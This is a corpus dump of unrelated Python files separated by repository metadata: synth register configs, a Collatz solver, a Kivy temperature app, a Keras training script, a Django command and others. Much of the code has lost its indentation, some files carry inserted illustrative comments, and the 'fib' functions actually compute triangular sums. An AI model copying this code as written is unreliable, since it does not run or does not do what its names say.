def __eq__(self, other: Any) -> bool:
if isinstance(other, OperatorConfig):
return (
self.first_detune == other.first_detune
and self.second_detune == other.second_detune
and self.multiply == other.multiply
and self.total_level == other.total_level
and self.key_scale == other.key_scale
and self.attack_rate == other.attack_rate
and self.ase == other.ase
and self.first_decay_rate == other.first_decay_rate
and self.second_decay_rate == other.second_decay_rate
and self.first_decay_level == other.first_decay_level
and self.release_rate == other.release_rate
)
return NotImplemented
# noinspection PyArgumentList
def __deepcopy__(self, _) -> object:
return OperatorConfig(self)
def repr_json(self):
return {
"tl": self.total_level,
"ar": self.attack_rate,
"d1r": self.first_decay_rate,
"d1l": self.first_decay_level,
"d2r": self.second_decay_rate,
"rr": self.release_rate,
"ks": self.key_scale,
"mul": self.multiply,
"dt1": self.first_detune,
"dt2": self.second_detune,
"ase": self.ase,
}
class NoteConfig:
def __init__(self, other=None) -> None:
self.right: bool = False if not other else other.right
self.left: bool = False if not other else other.left
self.octave: int = 0 if not other else other.octave
self.note: int = 0 if not other else other.note
self.key_fraction: int = 0 if not other else other.key_fraction
def __eq__(self, other: Any) -> bool:
if isinstance(other, NoteConfig):
return (
self.right == other.right
and self.left == other.left
and self.octave == other.octave
and self.note == other.note
and self.key_fraction == other.key_fraction
)
return NotImplemented
# noinspection PyArgumentList
def __deepcopy__(self, _) -> object:
return NoteConfig(self)
def repr_json(self):
return {
"right": self.right,
"left": self.left,
"octave": self.octave,
"note": self.note,
"key_fraction": self.key_fraction,
}
class ChannelConfig:
def __init__(self, other=None) -> None:
self.operators: List[OperatorConfig] = (
[] if not other else copy.deepcopy(other.operators)
)
self.fb: int = 0 if not other else other.fb
self.ams: int = 0 if not other else other.ams
self.pms: int = 0 if not other else other.pms
self.connection: int = 0 if not other else other.connection
self.noise: bool = False if not other else other.noise
self.noise_freq: int = 0 if not other else other.noise_freq
if not other:
for dev in range(4):
self.operators.append(OperatorConfig())
def __eq__(self, other: Any) -> bool:
if isinstance(other, ChannelConfig):
return (
self.fb == other.fb
and self.connection == other.connection
and self.ams == other.ams
and self.pms == other.pms
and self.operators == other.operators
and self.noise == other.noise
and self.noise_freq == other.noise_freq
)
return NotImplemented
# noinspection PyArgumentList
def __deepcopy__(self, _) -> object:
return ChannelConfig(self)
def repr_json(self):
return {
"feedback": self.fb,
"connection": self.connection,
"ams": self.ams,
"pms": self.pms,
"noise": self.noise,
"noise_freq": self.noise_freq,
"m1": self.operators[0],
"c1": self.operators[2],
"m2": self.operators[1],
"c2": self.operators[3],
}
class Config:
def __init__(
self,
id: int,
base: BaseConfig = BaseConfig(),
channel: ChannelConfig = ChannelConfig(),
operators: Operators = 0,
):
self._id = id
self._base = base
self._operators: Operators = operators
self._channel = channel
def __getattr__(self, item):
if item == "lfo":
return self._base.lfo
if item == "phs_md":
return self._base.phs_md
if item == "amp_md":
return self._base.amp_md
if item == "waveform":
return self._base.waveform
if item == "enabled_operators":
return self._operators
return getattr(self._channel, item)
def compare(self, base: BaseConfig, channel: ChannelConfig, operators: Operators):
return (
self._base == base
and self._channel == channel
and self._operators == operators
)
def repr_json(self) -> Dict:
return {
"id": self._id,
"base": self._base,
"operators": self._operators,
"channel": self._channel,
}
class ConfigEncoder(json.JSONEncoder):
def default(self, o: Any) -> Any:
if hasattr(o, "repr_json"):
return o.repr_json()
else:
return json.JSONEncoder.default(self, o)
class YM2151Command(VgmCommand):
command_type = VgmCommandType.YM2151
def __init__(self, cmd_id, reg: int, value: int) -> None:
super().__init__(cmd_id)
self.reg = reg
self.value = value
def __str__(self) -> str:
return f"YM2151Command(Reg: {hex(self.reg)}, Data: {hex(self.value)})"
def create(reg: int, value: int) -> YM2151Command:
return YM2151Command(0x54, reg, value)
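# --- Hedged usage sketch (added for illustration; not part of the original
# module). The values below are arbitrary; the point is to show the attribute
# delegation in Config.__getattr__ and JSON serialisation via ConfigEncoder.
if __name__ == "__main__":
    cfg = Config(
        id=0,
        base=BaseConfig(),
        channel=ChannelConfig(),
        operators=Operators.MOD1 | Operators.CAR1,
    )
    print(cfg.waveform)  # delegated to BaseConfig -> Waveform.SAW
    print(json.dumps(cfg, cls=ConfigEncoder, indent=2))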
| 2.625
| 3
|
problem14.py
|
prashdash112/Project-Euler-solutions
| 1
|
12783903
|
'''
The following iterative sequence is defined for the set of positive integers:
n → n/2 (n is even)
n → 3n + 1 (n is odd)
Using the rule above and starting with 13, we generate the following sequence:
13 → 40 → 20 → 10 → 5 → 16 → 8 → 4 → 2 → 1
It can be seen that this sequence (starting at 13 and finishing at 1) contains 10 terms. Although it has not been proved yet (Collatz Problem), it is thought that all starting numbers finish at 1.
Which starting number, under one million, produces the longest chain?
NOTE: Once the chain starts the terms are allowed to go above one million.
'''
def collatz(n): #returning the length of collatz sequence
arr=[]
while n >1:
arr.append(n)
if (n%2):
n=3*n+1
else:
n=n//2
return(len(arr)+1)
# Driver function
ans = max(range(2, 1000000), key=collatz)
print(ans)
'''
# Alternate function to generate collatz sequence
def collatz(n):
while n > 1:
print(n ,end=' ')
if (n % 2):
# n is odd
n = 3*n + 1
else:
# n is even
n = n//2
print(1,'\n')
'''
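# --- Hedged optimisation sketch (added for illustration; not part of the
# original solution). The brute-force search above recomputes every chain from
# scratch; a memoised variant caches chain lengths so shared suffixes
# (e.g. 40 -> 20 -> 10 -> 5 -> ...) are only counted once.
from functools import lru_cache

@lru_cache(maxsize=None)
def collatz_len(n):
    if n == 1:
        return 1
    return 1 + collatz_len(3 * n + 1 if n % 2 else n // 2)

# max(range(2, 1000000), key=collatz_len) reproduces the answer found above.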
| 4.3125
| 4
|
tests/gen/test_trade_data_generation.py
|
PontusHultkrantz/tcapy
| 0
|
12783904
|
"""Tests out the code for generating randomised test trades/orders.
"""
from __future__ import print_function
__author__ = 'saeedamen' # <NAME> / <EMAIL>
#
# Copyright 2017 Cuemacro Ltd. - http://www.cuemacro.com / @cuemacro
#
# See the License for the specific language governing permissions and limitations under the License.
#
import os
from tcapy.conf.constants import Constants
from tcapy.data.datatestcreator import DataTestCreator
from tcapy.data.databasesource import DatabaseSourceCSVBinary as DatabaseSourceCSV
from tcapy.data.databasesource import DatabaseSourceArctic
from tcapy.util.loggermanager import LoggerManager
logger = LoggerManager().getLogger(__name__)
constants = Constants()
postfix = 'dukascopy'
ticker = ['EURUSD']
start_date = '01 May 2017'
finish_date = '31 May 2017'
use_test_csv = True
# mainly just to speed up tests - note: you will need to generate the HDF5 files using convert_csv_to_h5.py from the CSVs
use_hdf5_market_files = False
logger.info('Make sure you have created folder ' + constants.csv_folder + ' & ' + constants.temp_data_folder +
' otherwise tests will fail')
########################################################################################################################
# you can change the test_data_harness_folder to one on your own machine with real data
folder = constants.test_data_harness_folder
eps = 10 ** -5
if use_test_csv:
# only contains limited amount of EURUSD and USDJPY in Apr/Jun 2017
if use_hdf5_market_files:
market_data_store = os.path.join(folder, 'small_test_market_df.h5')
else:
market_data_store = os.path.join(folder, 'small_test_market_df.csv.gz')
def test_randomized_trade_data_generation():
"""Tests randomized trade generation data (and writing to database)
"""
data_test_creator = DataTestCreator(write_to_db=False)
# use database source as Arctic for market data (assume we are using market data as a source)
if use_test_csv:
data_test_creator._database_source_market = DatabaseSourceCSV(market_data_database_csv=market_data_store)
else:
data_test_creator._database_source_market = DatabaseSourceArctic(postfix=postfix)
# create randomised trade/order data
trade_order = data_test_creator.create_test_trade_order(ticker, start_date=start_date, finish_date=finish_date)
# trade_order has dictionary of trade_df and order_df
# make sure the number of trades > number of orders
assert (len(trade_order['trade_df'].index) > len(trade_order['order_df'].index))
if __name__ == '__main__':
test_randomized_trade_data_generation()
# import pytest; pytest.main()
| 2.0625
| 2
|
piprot/models/messages.py
|
emichal/piprot
| 0
|
12783905
|
<gh_stars>0
class Messages:
NOT_ROTTEN: str = "{package} ({version}) is up to date"
IGNORED: str = "Ignoring updates for {package}."
CANNOT_FETCH: str = "Skipping {package} ({version}). Cannot fetch info from PyPI"
NO_DELAY_INFO: str = (
"{package} ({current_version}) is out of date. "
"No delay info available. "
"Latest version is: {latest_version}"
)
ROTTEN_NOT_DIRECT_SUCCESSOR: str = (
"{package} ({current_version}) "
"is {rotten_days} days out of date. "
"Latest version is: {latest_version} "
"({days_since_last_release} days old)."
)
ROTTEN_DIRECT_SUCCESSOR: str = (
"{package} ({current_version}) "
"is {rotten_days} days out of date. "
"Latest version is: {latest_version}"
)
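# --- Hedged usage note (added for illustration; not part of the original
# module). The attributes are plain str.format templates; a caller would fill
# in the named fields, e.g.:
#
#     Messages.ROTTEN_DIRECT_SUCCESSOR.format(
#         package="requests", current_version="2.19.0",
#         rotten_days=120, latest_version="2.25.1",
#     )
#
# The field names mirror the placeholders in the templates; how piprot itself
# invokes them is not shown in this file.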
| 2.28125
| 2
|
temp.py
|
CAES-Python/Coffee_maker_analog
| 0
|
12783906
|
# -*- coding: cp850 -*-
from kivy.app import App
from kivy.clock import Clock
from kivy.clock import Clock as clock
from kivy.config import Config
from kivy.gesture import Gesture,GestureDatabase
from kivy.graphics.vertex_instructions import (Rectangle,
Ellipse)
from kivy.graphics.context_instructions import Color
from kivy.lang import Builder
from kivy.uix.scatter import Scatter
from kivy.uix.label import Label
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.gridlayout import GridLayout
from kivy.uix.slider import Slider
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.checkbox import CheckBox
from kivy.uix.spinner import Spinner
from kivy.garden.knob import Knob
from kivy.garden.gauges import Gauges
from kivy.garden.light_indicator import Light_indicator
from kivy.properties import NumericProperty, BoundedNumericProperty, ListProperty, ObjectProperty, StringProperty
import collections
import math
import os
import random
import sys
from math import *
import gesture_box as gesture
# This is where Kivy captures gestures.
class Runner(gesture.GestureBox):
pass
#define the Screen Manager
class CoffeeScreenManager(ScreenManager):
pass
#define the screens
class MenuScreen(Screen):
pass
class CoffeeScreen(Screen):
h2o_ftemp = StringProperty('')
h2o_ctemp = StringProperty('')
def __init__(self, **kwargs):
super(CoffeeScreen, self).__init__(**kwargs)
Clock.schedule_once(self._finish_init)
# Clock.schedule_interval(self.disp_temp,0.1)
def _finish_init(self,dt):
self.set_ftemp=self.manager.get_screen('control').set_ftemp
self.temp_value=self.manager.get_screen('control').temp_value
self.my_temp=self.manager.get_screen('control').ids.my_temp
#self.current_ctemp= str((self.temp_value -32)/1.8)
# def disp_temp(self,dt):
# self.set_ftemp = str(self.temp_value)
# self.h2o_temp = self.set_ftemp
#self.my_temp = self.set_ftemp
#self.temp_value = float(self.set_ftemp)
class ControlScreen(Screen):
global event
set_ftemp = StringProperty("")
set_ctemp = StringProperty("")
min=NumericProperty(80)
max=NumericProperty(212)
temp_value=NumericProperty(150.0)
def __init__(self, **kwargs):
super(ControlScreen, self).__init__(**kwargs)
Clock.schedule_once(self._finish_init,0.5)
Clock.schedule_interval(self.disp_temp,0.1)
def _finish_init(self,dt):
self.my_temp= self.ids.my_temp
self.f_to_c()
def disp_temp(self,dt):
self.set_ftemp = str(self.temp_value)
def f_to_c(self):
self.current_ctemp= str(round((self.temp_value -32)/1.8,1))
self.set_ctemp = self.current_ctemp
print "set_temp is: ",self.set_ftemp
print "temp_val is: ",self.temp_value
def increase_temp(self):
if self.temp_value<self.max:
self.temp_value+=1
self.f_to_c()
print "set_temp is: ",self.set_ftemp
print "temp_value is: ",self.temp_value
def decrease_temp(self):
if self.temp_value>self.min:
self.temp_value-=1
self.f_to_c()
# Building the app. Kivy will look for the file "temp.kv" because the App subclass is called TempApp
class TempApp(App):
def build(self):
Config.set('graphics','fullscreen', True)
return CoffeeScreenManager()
# Run the program
if __name__ == "__main__":
TempApp().run()
| 2.390625
| 2
|
python_qt_client/widgets/menu_bar.py
|
rhedgeco/hyper_visualizer_clientserver
| 0
|
12783907
|
from PySide2.QtCore import QCoreApplication
from PySide2.QtWidgets import QMenuBar, QMenu
def _quit():
QCoreApplication.quit()
class MenuBar(QMenuBar):
def __init__(self):
super().__init__()
file_action = self.addMenu(QMenu('File'))
file_action.menu().addAction('New Project')
file_action.menu().addAction('Open')
file_action.menu().addSeparator()
file_action.menu().addAction('Save')
file_action.menu().addAction('Save As')
file_action.menu().addSeparator()
file_action.menu().addAction('Quit').triggered.connect(_quit)
edit_action = self.addMenu(QMenu('Edit'))
edit_action.menu().addAction('Undo')
edit_action.menu().addAction('Redo')
edit_action.menu().addSeparator()
edit_action.menu().addAction('Preferences')
view_action = self.addMenu(QMenu('View'))
view_action.menu().addAction('Show Logs')
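# --- Hedged usage sketch (added for illustration; not part of the original
# module). MenuBar is a plain QMenuBar subclass, so it can be attached to any
# QMainWindow; the window set-up below is an assumption about how the client
# uses it, not code taken from this project.
if __name__ == "__main__":
    import sys
    from PySide2.QtWidgets import QApplication, QMainWindow

    app = QApplication(sys.argv)
    window = QMainWindow()
    window.setMenuBar(MenuBar())
    window.show()
    sys.exit(app.exec_())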
| 2.5625
| 3
|
python_basics/fib.py
|
jakubczaplicki/projecteuler
| 0
|
12783908
|
<gh_stars>0
def fibr(n):
if n<=1:
return 1
else:
return n+fibr(n-1)
def fibi(n):
i=0
m=0
while i < n:
i += 1
m += i
return m
for n in xrange(0,10):
print n, fibi(n), fibr(n)
mygenerator = (x*x for x in range(3))
for i in mygenerator:
print i
print "2nd"
for i in mygenerator:
print i
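# Note: the second loop above prints nothing, because a generator expression
# can only be iterated over once; after the first loop it is exhausted.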
def createGenerator():
mylist = range(3)
for i in mylist:
yield i*i
mygenerator = createGenerator() # create a generator
print(mygenerator) # mygenerator is an object!
for i in mygenerator:
print(i)
| 3.796875
| 4
|
app/section_1/__init__.py
|
Shah-imran/Database_app
| 0
|
12783909
|
<reponame>Shah-imran/Database_app<filename>app/section_1/__init__.py<gh_stars>0
from flask import Blueprint
section_1 = Blueprint('section_1', __name__)
from . import views
| 1.226563
| 1
|
hwilib/devices/trezorlib/messages/MessageType.py
|
tomatoskittles/HWI
| 9
|
12783910
|
# Automatically generated by pb2py
# fmt: off
Initialize = 0
Ping = 1
Success = 2
Failure = 3
ChangePin = 4
WipeDevice = 5
GetEntropy = 9
Entropy = 10
LoadDevice = 13
ResetDevice = 14
Features = 17
PinMatrixRequest = 18
PinMatrixAck = 19
Cancel = 20
ClearSession = 24
ApplySettings = 25
ButtonRequest = 26
ButtonAck = 27
ApplyFlags = 28
BackupDevice = 34
EntropyRequest = 35
EntropyAck = 36
PassphraseRequest = 41
PassphraseAck = 42
PassphraseStateRequest = 77
PassphraseStateAck = 78
RecoveryDevice = 45
WordRequest = 46
WordAck = 47
GetFeatures = 55
FirmwareErase = 6
FirmwareUpload = 7
FirmwareRequest = 8
SelfTest = 32
GetPublicKey = 11
PublicKey = 12
SignTx = 15
TxRequest = 21
TxAck = 22
GetAddress = 29
Address = 30
SignMessage = 38
VerifyMessage = 39
MessageSignature = 40
SignIdentity = 53
SignedIdentity = 54
DebugLinkDecision = 100
DebugLinkGetState = 101
DebugLinkState = 102
DebugLinkStop = 103
DebugLinkLog = 104
DebugLinkMemoryRead = 110
DebugLinkMemory = 111
DebugLinkMemoryWrite = 112
DebugLinkFlashErase = 113
| 1.328125
| 1
|
train.py
|
lichen-lab/DeepChrInteract
| 0
|
12783911
|
# -*- coding:utf-8 -*-
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # Remove unnecessary information
import numpy as np
# cpu_count = 4
# The server has no graphical display, so matplotlib must be set up this way
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
# Pretty printing helper
def fancy_print(n = None, c = None, s = '#'):
print(s * 40)
print(n)
print(c)
print(s * 40)
    print() # blank line to avoid confusion
# Import all of the models
from model import *
# Image-reading generator
from keras.preprocessing.image import ImageDataGenerator
import tensorflow as tf
import keras
from keras.optimizers import Adam
from keras.callbacks import EarlyStopping
from keras.callbacks import ModelCheckpoint
from keras.callbacks import Callback
from sklearn.metrics import roc_auc_score, average_precision_score
from sklearn.model_selection import train_test_split
from sklearn import metrics
most_epoches = 500 # maximum number of training epochs (use 2-10 when testing)
def train_cnn_dense_resnet(gen_name, model_name, gene_length):
    # Print the parameters for easier checking
fancy_print('gen_name', gen_name)
fancy_print('model_name', model_name)
##############################
#
# png reader in iterator
#
##############################
    # train : validation : test = 8 : 1 : 1
train_datagen = ImageDataGenerator(rescale = 1./255, validation_split = 0.11) # set validation split
    BATCH_SIZE = 32 # batch size
train_generator = train_datagen.flow_from_directory(directory = 'data/'+gen_name+'/png_train/',
target_size = (gene_length*2, 5),
color_mode = 'grayscale',
class_mode = 'categorical',
batch_size = BATCH_SIZE,
subset = 'training', # set as training data
shuffle = True, # must shuffle
seed = 42,
)
val_generator = train_datagen.flow_from_directory(directory = 'data/'+gen_name+'/png_train/', # same directory as training data
target_size = (gene_length*2, 5),
color_mode = 'grayscale',
class_mode = 'categorical',
batch_size = BATCH_SIZE,
subset = 'validation', # set as validation data
shuffle = True, # must shuffle
seed = 42,
)
##############################
#
    # Loss visualization
#
##############################
class PlotProgress(keras.callbacks.Callback):
def __init__(self, entity = ['loss', 'accuracy']):
self.entity = entity
def on_train_begin(self, logs={}):
self.i = 0
self.x = []
self.losses = []
self.val_losses = []
self.accs = []
self.val_accs = []
self.fig = plt.figure()
self.logs = []
def on_epoch_end(self, epoch, logs={}):
self.logs.append(logs)
self.x.append(self.i)
            # loss
self.losses.append(logs.get('{}'.format(self.entity[0])))
self.val_losses.append(logs.get('val_{}'.format(self.entity[0])))
            # accuracy
self.accs.append(logs.get('{}'.format(self.entity[1])))
self.val_accs.append(logs.get('val_{}'.format(self.entity[1])))
self.i += 1
# clear_output(wait=True)
plt.figure(0)
            plt.clf() # clear the previous figure
plt.plot(self.x, self.losses, label="{}".format(self.entity[0]))
plt.plot(self.x, self.val_losses, label="val_{}".format(self.entity[0]))
plt.legend()
plt.savefig('result/'+gen_name+'/'+model_name+'/loss.png')
# plt.pause(0.01)
# plt.show()
plt.figure(1)
            plt.clf() # clear the previous figure
plt.plot(self.x, self.accs, label="{}".format(self.entity[1]))
plt.plot(self.x, self.val_accs, label="val_{}".format(self.entity[1]))
plt.legend()
plt.savefig('result/'+gen_name+'/'+model_name+'/acc.png')
# plt.pause(0.01)
# plt.show()
##############################
#
# Model building
#
##############################
if model_name == 'onehot_cnn_one_branch':
clf = model_onehot_cnn_one_branch(gene_length)
if model_name == 'onehot_embedding_dense':
clf = model_onehot_embedding_dense(gene_length)
if model_name == 'onehot_dense':
clf = model_onehot_dense(gene_length)
if model_name == 'onehot_resnet18':
clf = model_onehot_resnet18(gene_length)
if model_name == 'onehot_resnet34':
clf = model_onehot_resnet34(gene_length)
clf.summary() # Print model structure
early_stopping = EarlyStopping(monitor = 'val_accuracy', patience = 10, restore_best_weights = True)
    # Plotting callback
plot_progress = PlotProgress(entity = ['loss', 'accuracy'])
##############################
#
# Model training
#
##############################
# No need to count how many epochs, keras can count
history = clf.fit_generator(generator = train_generator,
epochs = most_epoches,
validation_data = val_generator,
steps_per_epoch = train_generator.samples // BATCH_SIZE,
validation_steps = val_generator.samples // BATCH_SIZE,
callbacks = [plot_progress, early_stopping],
# max_queue_size = 64,
# workers = cpu_count,
# use_multiprocessing = True,
            verbose = 2 # one log line per epoch
)
clf.save_weights('h5_weights/'+gen_name+'/'+model_name+'.h5')
    # Print the path for easier checking
fancy_print('save_weights', 'h5_weights/'+gen_name+'/'+model_name+'.h5', '=')
def train_cnn_separate(gen_name, model_name, gene_length):
##############################
#
    # Build the data iterators
#
##############################
from keras.preprocessing.image import ImageDataGenerator
    # train_datagen = ImageDataGenerator(horizontal_flip = True, vertical_flip = True, rescale = 1. / 255) # vertical flip, horizontal flip
train_datagen = ImageDataGenerator(rescale = 1. / 255, validation_split = 0.11)
    BATCH_SIZE = 32 # batch size
def generator_two_train():
train_generator1 = train_datagen.flow_from_directory(directory = 'data/'+gen_name+'/train_en/', target_size = (gene_length, 5),
color_mode = 'grayscale',
            class_mode = 'categorical', # 'categorical' returns 2D one-hot labels, 'binary' returns 1D binary labels, 'sparse' returns 1D integer labels
batch_size = BATCH_SIZE,
subset = 'training', # set as training data
shuffle = True,
            seed = 42) # shuffle both generators the same way
train_generator2 = train_datagen.flow_from_directory(directory = 'data/'+gen_name+'/train_pr/', target_size = (gene_length, 5),
color_mode = 'grayscale',
            class_mode = 'categorical', # 'categorical' returns 2D one-hot labels, 'binary' returns 1D binary labels, 'sparse' returns 1D integer labels
batch_size = BATCH_SIZE,
subset = 'training', # set as training data
shuffle = True,
            seed = 42) # shuffle both generators the same way
while True:
out1 = train_generator1.next()
out2 = train_generator2.next()
            yield [out1[0], out2[0]], out1[1] # yield the paired inputs together with the label
def generator_two_val():
val_generator1 = train_datagen.flow_from_directory(directory = 'data/'+gen_name+'/train_en/', target_size = (gene_length, 5),
color_mode = 'grayscale',
            class_mode = 'categorical', # 'categorical' returns 2D one-hot labels, 'binary' returns 1D binary labels, 'sparse' returns 1D integer labels
batch_size = BATCH_SIZE,
subset = 'validation', # set as validation data
shuffle =True,
            seed = 42) # shuffle both generators the same way
val_generator2 = train_datagen.flow_from_directory(directory = 'data/'+gen_name+'/train_pr/', target_size = (gene_length, 5),
color_mode = 'grayscale',
            class_mode = 'categorical', # 'categorical' returns 2D one-hot labels, 'binary' returns 1D binary labels, 'sparse' returns 1D integer labels
batch_size = BATCH_SIZE,
subset = 'validation', # set as validation data
shuffle = True,
            seed = 42) # shuffle both generators the same way
while True:
out1 = val_generator1.next()
out2 = val_generator2.next()
            yield [out1[0], out2[0]], out1[1] # yield the paired inputs together with the label
##############################
#
    # Model building
#
##############################
    # If there is a version incompatibility, use these two lines, otherwise warnings are raised
# import tensorflow.compat.v1 as tf
# tf.disable_v2_behavior()
from sklearn import metrics
from keras.callbacks import ModelCheckpoint
##############################
#
# Model building
#
##############################
if model_name == 'onehot_cnn_two_branch':
clf = model_onehot_cnn_two_branch(gene_length)
    clf.summary() # print the model structure
'''
filename = 'best_model.h5'
modelCheckpoint = ModelCheckpoint(filename, monitor = 'val_accuracy', save_best_only = True, mode = 'max')
'''
from keras.callbacks import EarlyStopping
early_stopping = EarlyStopping(monitor = 'val_accuracy', patience = 10, restore_best_weights = True)
'''
fancy_print('train_generator.next()[0]', train_generator.next()[0], '+')
fancy_print('train_generator.next()[1]', train_generator.next()[1], '+')
fancy_print('train_generator.next()[0].shape', train_generator.next()[0].shape, '+')
fancy_print('train_generator.next()[1].shape', train_generator.next()[1].shape, '+')
fancy_print('val_generator.next()[0]', val_generator.next()[0], '-')
fancy_print('val_generator.next()[1]', val_generator.next()[1], '-')
fancy_print('val_generator.next()[0].shape', val_generator.next()[0].shape, '-')
fancy_print('val_generator.next()[1].shape', val_generator.next()[1].shape, '-')
'''
##############################
#
    # Model training
#
##############################
    # No need to count how many epochs, keras can count
history = clf.fit_generator(generator = generator_two_train(),
epochs = most_epoches,
validation_data = generator_two_val(),
            steps_per_epoch = 24568 * 2 // BATCH_SIZE, # all training samples
            validation_steps = 3071 * 2 // BATCH_SIZE, # all validation samples
callbacks = [early_stopping],
            shuffle = True, # shuffle again
# max_queue_size = 64,
# workers = cpu_count,
# use_multiprocessing = True,
            verbose = 2) # one log line per epoch
clf.save_weights('h5_weights/'+gen_name+'/'+model_name+'.h5')
    # Print the path for easier checking
fancy_print('save_weights', 'h5_weights/'+gen_name+'/'+model_name+'.h5', '=')
def train_embedding(gen_name, model_name):
    # Print the parameters for easier checking
fancy_print('gen_name', gen_name)
fancy_print('model_name', model_name)
'''
2021-04-11 16:53:06.007063: E tensorflow/stream_executor/dnn.cc:616] CUDNN_STATUS_INTERNAL_ERROR
in tensorflow/stream_executor/cuda/cuda_dnn.cc(2011): 'cudnnRNNBackwardData( cudnn.handle(), rnn_desc.handle(),
model_dims.max_seq_length, output_desc.handles(), output_data.opaque(), output_desc.handles(), output_backprop_data.opaque(),
output_h_desc.handle(), output_h_backprop_data.opaque(), output_c_desc.handle(), output_c_backprop_data.opaque(),
rnn_desc.params_handle(), params.opaque(), input_h_desc.handle(), input_h_data.opaque(), input_c_desc.handle(),
input_c_data.opaque(), input_desc.handles(), input_backprop_data->opaque(), input_h_desc.handle(), input_h_backprop_data->opaque(),
input_c_desc.handle(), input_c_backprop_data->opaque(), workspace.opaque(), workspace.size(), reserve_space_data->opaque(), reserve_space_data->size())'
2021-04-11 16:53:06.007530: W tensorflow/core/framework/op_kernel.cc:1767] OP_REQUIRES failed at cudnn_rnn_ops.cc:1922:
Internal: Failed to call ThenRnnBackward with model config: [rnn_mode, rnn_input_mode, rnn_direction_mode]: 3, 0, 0 ,
[num_layers, input_size, num_units, dir_count, max_seq_length, batch_size, cell_num_units]: [1, 64, 50, 1, 100, 32, 0]
2021-04-11 16:53:06.007077: F tensorflow/stream_executor/cuda/cuda_dnn.cc:190] Check failed: status == CUDNN_STATUS_SUCCESS (7 vs. 0)Failed to set cuDNN stream.
    Workaround:
'''
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
physical_devices = tf.config.experimental.list_physical_devices('GPU')
tf.config.experimental.set_memory_growth(physical_devices[0], True)
##############################
#
    # Loss visualization
#
##############################
class PlotProgress(keras.callbacks.Callback):
def __init__(self, entity = ['loss', 'accuracy']):
self.entity = entity
def on_train_begin(self, logs={}):
self.i = 0
self.x = []
self.losses = []
self.val_losses = []
self.accs = []
self.val_accs = []
self.fig = plt.figure()
self.logs = []
def on_epoch_end(self, epoch, logs={}):
self.logs.append(logs)
self.x.append(self.i)
            # loss
self.losses.append(logs.get('{}'.format(self.entity[0])))
self.val_losses.append(logs.get('val_{}'.format(self.entity[0])))
            # accuracy
self.accs.append(logs.get('{}'.format(self.entity[1])))
self.val_accs.append(logs.get('val_{}'.format(self.entity[1])))
self.i += 1
plt.figure(0)
            plt.clf() # clear the previous figure
plt.plot(self.x, self.losses, label="{}".format(self.entity[0]))
plt.plot(self.x, self.val_losses, label="val_{}".format(self.entity[0]))
plt.legend()
plt.savefig('result/'+gen_name+'/'+model_name+'/loss.png')
# plt.pause(0.01)
# plt.show()
plt.figure(1)
            plt.clf() # clear the previous figure
plt.plot(self.x, self.accs, label="{}".format(self.entity[1]))
plt.plot(self.x, self.val_accs, label="val_{}".format(self.entity[1]))
plt.legend()
plt.savefig('result/'+gen_name+'/'+model_name+'/acc.png')
# plt.pause(0.01)
# plt.show()
train = np.load('data/'+gen_name+'/embedding_train.npz')
X_en_tra, X_pr_tra, y_tra = train['X_en_tra'], train['X_pr_tra'], train['y_tra']
##############################
#
# Model building
#
##############################
if model_name == 'embedding_cnn_one_branch':
model = model_embedding_cnn_one_branch()
if model_name == 'embedding_cnn_two_branch':
model = model_embedding_cnn_two_branch()
if model_name == 'embedding_dense':
model = model_embedding_dense()
if model_name == 'onehot_embedding_cnn_one_branch':
model = model_onehot_embedding_cnn_one_branch()
if model_name == 'onehot_embedding_cnn_two_branch':
model = model_onehot_embedding_cnn_two_branch()
model.summary()
early_stopping = EarlyStopping(monitor = 'val_accuracy', patience = 20, restore_best_weights = True)
    # Plotting callback
plot_progress = PlotProgress(entity = ['loss', 'accuracy'])
history = model.fit([X_en_tra, X_pr_tra], y_tra, epochs=most_epoches, batch_size=32, validation_split=0.11,
callbacks=[early_stopping, plot_progress],
# max_queue_size = 64,
# workers = cpu_count,
# use_multiprocessing = True,
            verbose = 2 # one log line per epoch
)
model.save_weights('h5_weights/'+gen_name+'/'+model_name+'.h5')
    # Print the path for easier checking
fancy_print('save_weights', 'h5_weights/'+gen_name+'/'+model_name+'.h5', '=')
########################################
#
# No code runs when this module is executed directly
#
########################################
if __name__ == '__main__':
pass
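# --- Hedged usage note (added for illustration; not part of the original
# module). The training entry points above are meant to be imported and called
# elsewhere; a call could look like the following, where the dataset name,
# model name and sequence length are placeholders and the data/, result/ and
# h5_weights/ folders are assumed to exist:
#
#     from train import train_cnn_dense_resnet
#     train_cnn_dense_resnet('GM12878', 'onehot_cnn_one_branch', 3000)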
| 2.328125
| 2
|
yepes/contrib/slugs/management/commands/collect_slugs.py
|
samuelmaudo/yepes
| 0
|
12783912
|
# -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django.core.management.base import BaseCommand, CommandError
from yepes.contrib.slugs import SlugHistory
class Command(BaseCommand):
help = 'Populates the slug history.'
requires_system_checks = True
def add_arguments(self, parser):
parser.add_argument('-f', '--force',
action='store_true',
default=False,
dest='force',
help='Collects slugs even if the history is not empty.')
parser.add_argument('-a', '--app-label',
action='store',
dest='app_label',
help='Limits the slug collection to the models of the given application.')
parser.add_argument('-m', '--model-names',
action='store',
dest='model_names',
help='Limits the slug collection to the given models.')
def handle(self, **options):
force = options.get('force')
app_label = options.get('app_label')
if not app_label:
app_label = None
model_names = options.get('model_names')
if not model_names:
model_names = None
else:
model_names = model_names.split(',')
SlugHistory.objects.populate(
force=force,
app_label=app_label,
model_names=model_names)
verbosity = int(options.get('verbosity', '1'))
if verbosity > 0:
self.stdout.write('Slugs were successfully collected.')
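# --- Hedged usage note (added for illustration; not part of the original
# module). As a Django management command this would typically be invoked as,
# for example (app and model names are placeholders):
#
#     python manage.py collect_slugs --force --app-label myapp -m Post,Page
#
# The flags correspond to the options declared in add_arguments() above.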
| 2.171875
| 2
|
webscraper.py
|
kmilouh/pln_project
| 0
|
12783913
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --------------------------------------------------------------------------------
# Libraries
from bs4 import BeautifulSoup
import requests
import time
import json
import os
from json import dumps
import anyjson
from datastore import SubSecction
from log_helper import LogHelper
from parsedata import Tokenizer
from collections import namedtuple
import nltk
# --------------------------------------------------------------------------------
# Download the nltk punkt tokenizer
nltk.download('punkt')
# --------------------------------------------------------------------------------
# Log files
loghelper = LogHelper()
